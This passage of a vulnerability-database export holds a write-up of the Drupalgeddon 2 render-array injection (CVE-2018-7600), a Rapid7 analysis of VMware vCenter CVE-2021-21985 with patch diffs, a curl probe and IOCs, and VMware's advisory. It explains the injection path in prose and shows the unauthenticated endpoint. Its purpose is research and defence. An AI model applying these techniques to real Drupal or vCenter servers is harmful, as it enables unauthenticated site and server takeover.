reveal exactly how it works.\r\n\r\nIn brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication. By exploiting this vulnerability an attacker would have been able to carry out a full site takeover of any Drupal customer.\r\n\r\nThe vulnerability existed on all Drupal versions from 6 to 8, though has since been patched to those who manually update their site. In this document we will showcase real life attack scenarios around an out-of-the-box installation of Drupal\u2019s flagship product, Drupal 8.\r\n\r\n### Technical Details\r\n\r\n#### The Vulnerability\r\n\r\nTo provide some background, Drupal\u2019s Form API was introduced in Drupal 6 and allowed alteration of the form data during the form rendering process. This revolutionized the way markup processing was done.\r\n\r\nIn Drupal 7 the Form API was generalized to what is now known as \u201cRenderable Arrays\u201d. This extended API is used to represent the structure of most of the UI elements in Drupal, such as pages, blocks, nodes and more.\r\n\r\nRenderable arrays contain metadata that is used in the rendering process. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). Please see below for an example:\r\n```\r\n[\r\n\u2018#type\u2019 => \u2018markup\u2019,\r\n\u2018#markup\u2019 => \u2018<em>some text</em>\u2019,\r\n\u2018#prefix\u2019 => \u2018<div>\u2019,\r\n\u2018#suffix\u2019 => \u2018</div>\u2019\r\n]\r\n```\r\n\r\n#### Drupal\u2019s Patch\r\n\r\nThe patch that Drupal published adds a single class called RequestSanitizer with a stripDangerousValues method that unsets all the items in an input array for keys that start with a hash sign. This method sanitizes input data in `$_GET`, `$_POST` & `$_COOKIES` during the very early stages of Drupal\u2019s bootstrap (immediately after loading the site configurations).\r\n\r\nWe assume that one of the reasons that the patch was done in this way was to make it harder to find and exploit the vulnerability.\r\n\r\n#### Finding an Attack Vector\r\n\r\nBecause of the above we focused on forms that are exposed to anonymous users.\r\n\r\nThere are a few of those forms available, one of which is the user registration form. This form contains multiple fields, as can be seen in the screenshot below.\r\n\r\n\r\n\r\nFigure 1: The Drupal registration form.\r\n\r\nWe knew that we needed to inject a renderable array somewhere in the form structure, we just had to find out where.\r\n\r\nAs it happens, the \u201cEmail address\u201d field does not sanitize the type of input that it receives. This allowed us to inject an array to the form array structure (as the value of the email field).\r\n\r\n\r\n\r\nFigure 2: Injecting our renderable array into the mail input of the registration form.\r\n\r\n\r\n\r\nFigure 3: Example of injected form renderable array.\r\n\r\nNow all we needed was for Drupal to render our injected array. Since Drupal treats our injected array as a value and not as an element, we needed to trick Drupal into rendering it.\r\n\r\nThe situations in which Drupal renders arrays are as follows:\r\n\r\n1. Page load\r\n2. Drupal AJAX API \u2013 i.e. when a user fills an AJAX form, a request is made to Drupal which renders an HTML markup and updates the form.\r\n\r\n\r\nAfter investigating possible attack vectors surrounding the above functionalities, because of the post-submission rendering process and the way Drupal implements it, we came to the conclusion that an AJAX API call is our best option to leverage an attack.\r\n\r\nAs part of the user registration form, the \u201cPicture\u201d field uses Drupal\u2019s AJAX API to upload a picture into the server and replace it with a thumbnail of the uploaded image.\r\n\r\n\r\n\r\nFigure 4: Form used to upload a picture using AJAX API.\r\n\r\nDiving into the AJAX file upload callback revealed that it uses a GET parameter to locate the part of the form that needs to be updated in the client.\r\n\r\n\r\n\r\nFigure 5: The AJAX \u2018upload file\u2019 callback function code.\r\n\r\nAfter pointing element_parents to the part of the form that contained our injected array, Drupal successfully rendered it.\r\n\r\n#### Weaponizing Drupalgeddon 2\r\n\r\nNow, all we had to do is to inject a malicious render array that uses one of Drupal\u2019s rendering callback to execute code on the system.\r\n\r\nThere were several properties we could have injected:\r\n\r\n* #access_callback\r\n\t* Used by Drupal to determine whether or not the current user has access to an element.\r\n* #pre_render\r\n\t* Manipulates the render array before rendering.\r\n* #lazy_builder\r\n\t* Used to add elements in the very end of the rendering process.\r\n* #post_render\r\n\t* Receives the result of the rendering process and adds wrappers around it.\r\n\t\r\n\t\r\nFor our POC to work, we chose the #lazy_builder element as the one being injected into the mail array. Combined with the AJAX API callback functionality, we could direct Drupal to render our malicious array.\r\n\r\nThis allowed us to take control over the administrator\u2019s account, install a malicious backdoor module and finally execute arbitrary commands on the server.\r\n\r\n\r\n\r\nFigure 6: injecting malicious command into one of Drupal\u2019s rendering callbacks.\r\n\r\n\r\n\r\nFigure 7: Successfully executing shell commands using the malicious module.\r\n\r\n### Conclusion\r\n\r\nAfter seeing earlier publications on Twitter and several security blogs, it was apparent that there was much confusion among the community regarding this vulnerability announcement, with some even doubting the severity of it. As a result, we considered it worthwhile to looking deeper into.\r\n\r\nThe research however was challenging as we were starting from a very large attack surface since the patch blurred the real attack vectors. To expedite our findings, we were fortunate to be joined by experts in the Drupal platform. The final results highlight how easy it is for organization to be exposed through no fault of their own, but rather through the third party platforms they use every day.", "cvss3": {}, "published": "2018-03-30T00:00:00", "type": "seebug", "title": "Drupal core Remote Code Execution(CVE-2018-7600)\n (Drupalgeddon2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-30T00:00:00", "id": "SSV:97207", "href": "https://www.seebug.org/vuldb/ssvid-97207", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-07-24T09:59:06", "description": "Rapid7\n\n[May 26, 2021 5:34pm UTC (1 day ago)](https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?#rapid7-analysis)\u2022 Last updated May 27, 2021 6:39pm UTC (7 hours ago)\n\n\n\n###### Technical Analysis\n\n**Threat status:** Impending threat\n**Attacker utility:** Network infrastructure compromise\n\n## Description\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](https://www.vmware.com/security/advisories/VMSA-2021-0010.html), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server and VMware Cloud Foundation. The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nVMware has released a [blog post](https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html) and a [supplemental FAQ](https://core.vmware.com/resource/vmsa-2021-0010-faq) for VMSA-2021-0010, which highlights the elevated threat of ransomware, including against organizations running vCenter Server. As of May 26, 2021, there are no reports of exploitation in the wild\u2014this, however, is unlikely to last.\n\n## Affected products\n\n- vCenter Server 6.5\n- vCenter Server 6.7\n- vCenter Server 7.0\n- Cloud Foundation (vCenter Server) 3.x\n- Cloud Foundation (vCenter Server) 4.x\n\nFor information on fixed versions, see the matrix of affected products and updates in VMware\u2019s advisory: https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n\n## Rapid7 analysis\n\nAs with [previous vCenter Server vulnerabilities](https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis), we classify CVE-2021-21985 as an impending threat: It is a high-value attack target for both advanced and commodity threat actors, and we expect exploitation to occur quickly and at scale. As of May 26, 2021, Rapid7 Labs identified roughly 6,000 vCenter Server instances exposed to the public internet.\n\n### Patch\n\nThe following changes add authentication to the Virtual SAN Health Check plugin\u2019s `/rest/*` endpoints:\n\n```xml\n--- a/unpatched/src/h5-vsan-context.jar/WEB-INF/web.xml\n+++ b/patched/src/h5-vsan-context.jar/WEB-INF/web.xml\n@@ -5,6 +5,21 @@\n\n <display-name>h5-vsan-service</display-name>\n\n+ <context-param>\n+ <param-name>contextConfigLocation</param-name>\n+ <param-value>/WEB-INF/spring/bundle-context.xml</param-value>\n+ </context-param>\n+\n+ <!-- The application context needs to be OSGI-enabled in order to look up services -->\n+ <context-param>\n+ <param-name>contextClass</param-name>\n+ <param-value>org.eclipse.virgo.web.dm.ServerOsgiBundleXmlWebApplicationContext</param-value>\n+ </context-param>\n+\n+ <listener>\n+ <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>\n+ </listener>\n+\n <!-- Processes application requests -->\n <servlet>\n <servlet-name>springServlet</servlet-name>\n@@ -12,7 +27,7 @@\n\n <init-param>\n <param-name>contextConfigLocation</param-name>\n- <param-value>/WEB-INF/spring/bundle-context.xml</param-value>\n+ <param-value>/WEB-INF/spring/empy-context.xml</param-value>\n </init-param>\n\n <!-- The application context needs to be OSGI-enabled in order to look up services -->\n@@ -40,4 +55,14 @@\n <url-pattern>/*</url-pattern>\n </filter-mapping>\n\n+ <filter>\n+ <filter-name>authenticationFilter</filter-name>\n+ <filter-class>com.vmware.vsan.client.services.AuthenticationFilter</filter-class>\n+ </filter>\n+\n+ <filter-mapping>\n+ <filter-name>authenticationFilter</filter-name>\n+ <url-pattern>/rest/*</url-pattern>\n+ </filter-mapping>\n+\n </web-app>\n```\n\n```java\npackage com.vmware.vsan.client.services;\n\nimport com.vmware.vise.usersession.UserSessionService;\nimport java.io.IOException;\nimport javax.servlet.Filter;\nimport javax.servlet.FilterChain;\nimport javax.servlet.FilterConfig;\nimport javax.servlet.ServletException;\nimport javax.servlet.ServletRequest;\nimport javax.servlet.ServletResponse;\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.beans.factory.config.AutowireCapableBeanFactory;\nimport org.springframework.web.context.WebApplicationContext;\nimport org.springframework.web.context.support.WebApplicationContextUtils;\n\npublic class AuthenticationFilter implements Filter {\n private static final Logger logger = LoggerFactory.getLogger(AuthenticationFilter.class);\n\n @Autowired\n private UserSessionService userSessionService;\n\n public void init(FilterConfig filterConfig) {\n WebApplicationContext context = WebApplicationContextUtils.getWebApplicationContext(filterConfig.getServletContext());\n AutowireCapableBeanFactory factory = context.getAutowireCapableBeanFactory();\n factory.autowireBean(this);\n }\n\n public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain) throws IOException, ServletException {\n if (this.userSessionService.getUserSession() == null) {\n HttpServletRequest httpRequest = (HttpServletRequest)request;\n HttpServletResponse httpResponse = (HttpServletResponse)response;\n logger.warn(String.format(\"Null session detected for a %s request to %s\", new Object[] { httpRequest.getMethod(), httpRequest.getRequestURL() }));\n httpResponse.setStatus(401);\n return;\n }\n filterChain.doFilter(request, response);\n }\n\n public void destroy() {}\n}\n```\n\nFurthermore, additional input validation was added to the `com.vmware.vsan.client.services.ProxygenController` class:\n\n```java\n--- a/unpatched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\n+++ b/patched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\n@@ -1,151 +1,152 @@\n package com.vmware.vsan.client.services;\n\n import com.google.common.collect.ImmutableMap;\n import com.google.gson.Gson;\n+import com.vmware.proxygen.ts.TsService;\n import com.vmware.vim.binding.vmodl.LocalizableMessage;\n import com.vmware.vim.binding.vmodl.MethodFault;\n import com.vmware.vim.binding.vmodl.RuntimeFault;\n import com.vmware.vsphere.client.vsan.util.MessageBundle;\n import java.lang.reflect.InvocationTargetException;\n import java.lang.reflect.Method;\n import java.util.HashMap;\n import java.util.List;\n import java.util.Map;\n import org.apache.commons.lang.StringUtils;\n import org.slf4j.Logger;\n import org.slf4j.LoggerFactory;\n import org.springframework.beans.BeansException;\n import org.springframework.beans.factory.BeanFactory;\n import org.springframework.beans.factory.annotation.Autowired;\n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.PathVariable;\n import org.springframework.web.bind.annotation.RequestBody;\n import org.springframework.web.bind.annotation.RequestMapping;\n import org.springframework.web.bind.annotation.RequestMethod;\n import org.springframework.web.bind.annotation.RequestParam;\n import org.springframework.web.bind.annotation.ResponseBody;\n import org.springframework.web.multipart.MultipartFile;\n\n @Controller\n @RequestMapping({\"/proxy\"})\n public class ProxygenController extends RestControllerBase {\n private static final Logger logger = LoggerFactory.getLogger(ProxygenController.class);\n\n @Autowired\n private BeanFactory beanFactory;\n\n @Autowired\n private MessageBundle messages;\n\n @RequestMapping(value = {\"/service/{beanIdOrClassName}/{methodName}\"}, method = {RequestMethod.POST}, consumes = {\"application/json\"}, produces = {\"application/json\"})\n @ResponseBody\n public Object invokeServiceWithJson(@PathVariable(\"beanIdOrClassName\") String beanIdOrClassName, @PathVariable(\"methodName\") String methodName, @RequestBody Map<String, Object> body) throws Exception {\n List<Object> rawData = null;\n try {\n rawData = (List<Object>)body.get(\"methodInput\");\n } catch (Exception e) {\n logger.error(\"service method failed to extract input data\", e);\n return handleException(e);\n }\n return invokeService(beanIdOrClassName, methodName, null, rawData);\n }\n\n @RequestMapping(value = {\"/service/{beanIdOrClassName}/{methodName}\"}, method = {RequestMethod.POST}, consumes = {\"multipart/form-data\"}, produces = {\"application/json\"})\n @ResponseBody\n public Object invokeServiceWithMultipartFormData(@PathVariable(\"beanIdOrClassName\") String beanIdOrClassName, @PathVariable(\"methodName\") String methodName, @RequestParam(\"file\") MultipartFile[] files, @RequestParam(\"methodInput\") String rawData) throws Exception {\n List<Object> data = null;\n try {\n Gson gson = new Gson();\n data = (List<Object>)gson.fromJson(rawData, List.class);\n } catch (Exception e) {\n logger.error(\"service method failed to extract input data\", e);\n return handleException(e);\n }\n return invokeService(beanIdOrClassName, methodName, files, data);\n }\n\n private Object invokeService(String beanIdOrClassName, String methodName, MultipartFile[] files, List<Object> data) throws Exception {\n try {\n Object bean = null;\n String beanName = null;\n Class<?> beanClass = null;\n try {\n beanClass = Class.forName(beanIdOrClassName);\n beanName = StringUtils.uncapitalize(beanClass.getSimpleName());\n } catch (ClassNotFoundException classNotFoundException) {\n beanName = beanIdOrClassName;\n }\n try {\n bean = this.beanFactory.getBean(beanName);\n } catch (BeansException beansException) {\n bean = this.beanFactory.getBean(beanClass);\n }\n byte b;\n int i;\n Method[] arrayOfMethod;\n for (i = (arrayOfMethod = bean.getClass().getMethods()).length, b = 0; b < i; ) {\n Method method = arrayOfMethod[b];\n- if (!method.getName().equals(methodName)) {\n+ if (!method.getName().equals(methodName) || !method.isAnnotationPresent((Class)TsService.class)) {\n b++;\n continue;\n }\n ProxygenSerializer serializer = new ProxygenSerializer();\n Object[] methodInput = serializer.deserializeMethodInput(data, files, method);\n Object result = method.invoke(bean, methodInput);\n Map<String, Object> map = new HashMap<>();\n map.put(\"result\", serializer.serialize(result));\n return map;\n }\n } catch (Exception e) {\n logger.error(\"service method failed to invoke\", e);\n return handleException(e);\n }\n logger.error(\"service method not found: \" + methodName + \" @ \" + beanIdOrClassName);\n return handleException(null);\n }\n\n private Object handleException(Throwable t) {\n if (t instanceof InvocationTargetException)\n return handleException(((InvocationTargetException)t).getTargetException());\n if (t instanceof java.util.concurrent.ExecutionException && t.getCause() != t)\n return handleException(t.getCause());\n if (t instanceof com.vmware.vise.data.query.DataException && t.getCause() != t)\n return handleException(t.getCause());\n if (t instanceof com.vmware.vim.vmomi.client.common.UnexpectedStatusCodeException)\n return ImmutableMap.of(\"error\", this.messages.string(\"util.dataservice.notRespondingFault\"));\n if (t instanceof VsanUiLocalizableException) {\n VsanUiLocalizableException localizableException = (VsanUiLocalizableException)t;\n return ImmutableMap.of(\"error\", this.messages.string(\n localizableException.getErrorKey(), localizableException.getParams()));\n }\n LocalizableMessage[] faultMessage = null;\n String vmodlMessage = null;\n if (t instanceof MethodFault) {\n faultMessage = ((MethodFault)t).getFaultMessage();\n vmodlMessage = ((MethodFault)t).getMessage();\n } else if (t instanceof RuntimeFault) {\n faultMessage = ((RuntimeFault)t).getFaultMessage();\n vmodlMessage = ((RuntimeFault)t).getMessage();\n }\n if (faultMessage != null) {\n byte b;\n int i;\n LocalizableMessage[] arrayOfLocalizableMessage;\n for (i = (arrayOfLocalizableMessage = faultMessage).length, b = 0; b < i; ) {\n LocalizableMessage localizable = arrayOfLocalizableMessage[b];\n if (localizable.getMessage() != null && !localizable.getMessage().isEmpty())\n return ImmutableMap.of(\"error\", localizeFault(localizable.getMessage()));\n if (localizable.getKey() != null && !localizable.getKey().isEmpty())\n return ImmutableMap.of(\"error\", localizeFault(localizable.getKey()));\n b++;\n }\n }\n if (StringUtils.isNotBlank(vmodlMessage))\n return ImmutableMap.of(\"error\", vmodlMessage);\n return ImmutableMap.of(\"error\", this.messages.string(\"vsan.common.generic.error\"));\n }\n\n private String localizeFault(String key) {\n return key;\n }\n }\n```\n\nWhich appears to be vulnerable to Java [unsafe reflection](https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection):\n\n```\nunpatched/src/h5-vsan-service.jar/com/vmware/vsan/client/services/ProxygenController.java\nseverity:warning rule:java.lang.security.audit.unsafe-reflection.unsafe-reflection: If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke,\nthe potential exists for the attacker to create control flow paths through the application\nthat were not intended by the application developers.\nThis attack vector may allow the attacker to bypass authentication or access control checks\nor otherwise cause the application to behave in an unexpected manner.\n\n73: beanClass = Class.forName(beanIdOrClassName);\n```\n\n### PoC\n\nThe affected endpoint is `/ui/h5-vsan/rest/proxy/service`, which responds to `POST` request:\n\n```shell\nwvu@kharak:~$ curl -kv https://[redacted]/ui/h5-vsan/rest/proxy/service/CLASS/METHOD -H \"Content-Type: application/json\" -d {}\n* Trying [redacted]...\n* TCP_NODELAY set\n* Connected to [redacted] ([redacted]) port 443 (#0)\n* ALPN, offering h2\n* ALPN, offering http/1.1\n* successfully set certificate verify locations:\n* CAfile: /etc/ssl/cert.pem\n CApath: none\n* TLSv1.2 (OUT), TLS handshake, Client hello (1):\n* TLSv1.2 (IN), TLS handshake, Server hello (2):\n* TLSv1.2 (IN), TLS handshake, Certificate (11):\n* TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n* TLSv1.2 (IN), TLS handshake, Server finished (14):\n* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n* TLSv1.2 (OUT), TLS handshake, Finished (20):\n* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n* TLSv1.2 (IN), TLS handshake, Finished (20):\n* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n* ALPN, server did not agree to a protocol\n* Server certificate:\n* subject: CN=[redacted]; C=US\n* start date: Apr 20 21:05:53 2020 GMT\n* expire date: Apr 15 21:05:51 2030 GMT\n* issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=vcenter-6-7; OU=VMware Engineering\n* SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n> POST /ui/h5-vsan/rest/proxy/service/CLASS/METHOD HTTP/1.1\n> Host: [redacted]\n> User-Agent: curl/7.64.1\n> Accept: */*\n> Content-Type: application/json\n> Content-Length: 2\n>\n* upload completely sent off: 2 out of 2 bytes\n< HTTP/1.1 200\n< Set-Cookie: JSESSIONID=AF396E0FF5219A869AD53ABF34B7B0AF; Path=/ui/h5-vsan; HttpOnly\n< Content-Type: application/json;charset=UTF-8\n< Transfer-Encoding: chunked\n< Date: Thu, 27 May 2021 17:32:13 GMT\n< Server: Anonymous\n<\n* Connection #0 to host [redacted] left intact\n{\"error\":\"CLASS cannot be found by com.vmware.vsphere.client.h5vsan-6.7.0.10000-com.vmware.vsan.client.h5-vsan-service_6.5.0.8170065-storage-main in KernelBundleClassLoader: [bundle=com.vmware.vsphere.client.h5vsan-6.7.0.10000-com.vmware.vsan.client.h5-vsan-service_6.5.0.8170065-storage-main]\"}* Closing connection 0\nwvu@kharak:~$\n```\n\nNote that this PoC **does not** achieve RCE on its own.\n\n### IOCs\n\n> The default log location for Virtual SAN health check plugin is `/var/log/vmware/vsan-health`. And user can change it by modifying the configuration item \u201c`logdir`\u201d in the configuration file under `/usr/lib/vmware-vpx/vsan-health`. On the vCenter Server for Windows, the file is located in `%VMWARE_LOG_DIR%\\vsan-health`. **No security related information is logged in the log file.**\n\nhttps://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/products/products/vsan/vmw-gdl-vsan-health-check.pdf\n\n> The vCenter Server logs are placed in a different directory on disk depending on vCenter Server version and the deployed platform:\n>\n> - vCenter Server 6.x and higher versions on Windows server: `C:\\ProgramData\\VMware\\vCenterServer\\Logs\\`\n> - vCenter Server Appliance 6.x: `/var/log/vmware/`\n> - vCenter Server Appliance 6.x flash: `/var/log/vmware/vsphere-client`\n> - vCenter Server Appliance 6.x HTML5: `/var/log/vmware/vsphere-ui`\n\nhttps://kb.vmware.com/s/article/1021804\n\n> This article provides steps to increase the size and number of the `hostd`, `vpxa`, and `vpxd` logs so that additional data is saved. This data may be useful for troubleshooting purposes.\n\nhttps://kb.vmware.com/s/article/1004795\n\n## Guidance\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](https://kb.vmware.com/s/article/83829). Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\n## References\n\n- https://www.vmware.com/security/advisories/VMSA-2021-0010.html\n- https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html\n- https://core.vmware.com/resource/vmsa-2021-0010-faq", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "seebug", "title": "VMware vCenter Server\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-21985\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T00:00:00", "id": "SSV:99260", "href": "https://www.seebug.org/vuldb/ssvid-99260", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2021-09-02T23:03:48", "description": "##### **1\\. Impacted Products**\n\n * VMware vCenter Server (vCenter Server) \n\n * VMware Cloud Foundation (Cloud Foundation) \n\n\n##### **2\\. Introduction**\n\nMultiple vulnerabilities in the vSphere Client (HTML5) were privately reported to VMware. Updates and workarounds are available to address these vulnerabilities in affected VMware products. \n\n\n##### **3a. VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client (CVE-2021-21985)**\n\n**Description**\n\nThe vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. VMware has evaluated the severity of this issue to be in the [Critical severity range](<https://www.vmware.com/support/policies/security_response.html>) with a maximum CVSSv3 base score of [9.8.](<https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) \n\n\n**Known Attack Vectors**\n\nA malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. \n\n**Resolution**\n\nTo remediate CVE-2021-21985 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments. \n\n\n**Workarounds**\n\nWorkarounds for CVE-2021-21985 have been listed in the 'Workarounds' column of the 'Response Matrix' below. \n\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * The affected Virtual SAN Health Check plug-in is enabled by default in all vCenter Server deployments, whether or not vSAN is being used. \n\n * A supplemental blog post was created for additional clarification. Please see: <https://via.vmw.com/vmsa-2021-0010-blog> \n \n\n\n**Acknowledgements**\n\nVMware would like to thank Ricter Z of 360 Noah Lab for reporting this issue to us. \n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-25T00:00:00", "type": "vmware", "title": "VMware vCenter Server updates address remote code execution and authentication vulnerabilities (CVE-2021-21985, CVE-2021-21986)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-21986"], "modified": "2021-05-25T00:00:00", "id": "VMSA-2021-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0010.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}